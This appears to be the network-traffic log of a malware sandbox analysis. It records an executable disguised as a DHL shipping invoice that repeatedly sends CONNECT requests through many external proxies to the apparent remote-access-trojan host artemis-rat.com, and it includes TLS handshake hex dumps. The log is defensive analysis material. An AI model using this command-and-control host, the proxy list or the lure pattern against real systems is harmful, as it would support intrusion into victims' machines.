                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.749928951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            766192.168.2.451668165.227.196.37637426484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.894299984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046652079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.104195118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.112169027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.218585968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.307118893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.343599081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:14.343684912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:02.508383989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            767192.168.2.452301102.132.38.18780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.896054029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            768192.168.2.451511203.95.198.3580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.896322966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            769192.168.2.45243672.210.221.19741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.897754908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            770192.168.2.45238765.1.40.4710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.897756100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.188245058 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            771192.168.2.452399211.222.252.18781936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.897757053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            772192.168.2.45252798.175.31.19541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.897846937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            773192.168.2.45252823.94.123.20288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.897919893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.359288931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.062588930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.250083923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359587908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:23.880724907 CET84INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:23 GMT
                            Transfer-Encoding: chunked


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            774192.168.2.449911189.240.60.16990906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.897979021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.311372995 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            775192.168.2.452487207.180.198.241374436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.898139954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562284946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.250381947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            776192.168.2.452302103.164.106.7856786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.898242950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            777192.168.2.452553104.129.192.5588006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.898242950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.052937984 CET125INHTTP/1.1 407 Unauthorized
                            Server: Zscaler/6.2
                            Cache-control: no-cache
                            Content-Length: 0
                            Proxy-Authenticate: Negotiate


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            778192.168.2.4524278.213.128.9045066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.898334980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.537347078 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:06.537749052 CET44INHTTP/1.1 200 OK
                            Content-Type: text/html


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            779192.168.2.452300103.118.46.17780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.898776054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            780192.168.2.45241990.188.250.16806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.903074980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            781192.168.2.4525635.75.161.31482376484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.904947042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            782192.168.2.452299106.105.218.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.905224085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            783192.168.2.452398218.252.244.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.905474901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.216934919 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            784192.168.2.45245589.35.237.18780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.907114029 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:02.433430910 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:03.354228973 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            785192.168.2.452374171.250.221.19110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.907325983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            786192.168.2.45257151.89.14.70806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.907562017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.126890898 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            787192.168.2.450819132.148.82.125456056484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.907922029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            788192.168.2.451399189.240.60.16890906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.909051895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.322156906 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            789192.168.2.45201064.227.108.25319086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.912549019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            790192.168.2.451573174.75.211.22241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.917165995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            791192.168.2.45156651.89.173.40301996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.917897940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062566996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.063009024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.062788963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            792192.168.2.45255691.151.90.9806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.920375109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.129044056 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:02.150470972 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 1d 4c 71 37 dc c8 8d c6 38 18 d0 e5 6d a3 41 83 03 6f 41 9b 14 d1 f4 2f 1d bd 91 6f 39 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lheLq78mAoA/o9*,+0/$#('=<5/artemis-rat.com#.QoSd\I"&+~?vC{DBM-b-KB*F,X9
                            Mar 12, 2024 08:37:02.656758070 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 f0 06 1e 1b 30 9b 2f 88 0f ad ba 5d 1a ea 28 42 8d fd 02 c0 6f 20 95 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                            Data Ascii: C?e0/](Bo DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                            Mar 12, 2024 08:37:02.656810045 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                            Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                            Mar 12, 2024 08:37:02.656830072 CET536INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                            Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                            Mar 12, 2024 08:37:02.656872988 CET536INData Raw: 30 39 33 30 30 30 30 30 34 32 5a 30 46 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 13 30 11 06 03 55 04 03 13 0a 47 54 53 20 43 41 20 31 50
                            Data Ascii: 0930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50"0*H0$-D[>eO-XZ(juORUJ[H6%#_`e\:\m}0N<etxs1to
                            Mar 12, 2024 08:37:02.656887054 CET536INData Raw: 2b 06 01 05 05 07 30 01 86 1a 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f 67 74 73 72 31 30 30 06 08 2b 06 01 05 05 07 30 02 86 24 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 72 65 70 6f 2f 63 65 72 74 73 2f 67 74 73 72 31
                            Data Ascii: +0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.der04U-0+0)'%#http://crl.pki.goog/gtsr1/gtsr1.crl0MU F0D08+y0*0(+https://pki.goog/repository/0g0*Hlc'
                            Mar 12, 2024 08:37:02.656909943 CET536INData Raw: 08 0f 09 3e 23 5a c7 e3 42 2d 7a 36 e4 3d 98 96 60 39 98 ea d1 db 63 2a eb 78 09 b1 4e 21 b3 8e b7 ce 3e 92 f1 95 5c a4 39 d0 c0 2b c8 53 15 f5 d2 2f 82 cd 06 74 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb
                            Data Ascii: >#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!
                            Mar 12, 2024 08:37:02.656930923 CET536INData Raw: f6 b1 f9 ce 84 1d b1 f9 c5 97 de ef b9 f2 a3 e9 bc 12 89 5e a7 aa 52 ab f8 23 27 cb a4 b1 9c 63 db d7 99 7e f0 0a 5e eb 68 a6 f4 c6 5a 47 0d 4d 10 33 e3 4e b1 13 a3 c8 18 6c 4b ec fc 09 90 df 9d 64 29 25 23 07 a1 b4 d2 3d 2e 60 e0 cf d2 09 87 bb
                            Data Ascii: ^R#'c~^hZGM3NlKd)%#=.`HMzY1.ml~&E=y(&<hS:+z.uVdOh=@\5lPL 3R2)%*Hrd8fcx{\wv
                            Mar 12, 2024 08:37:02.656944990 CET536INData Raw: 66 2c ef f0 89 13 71 3e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70
                            Data Ascii: f,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+
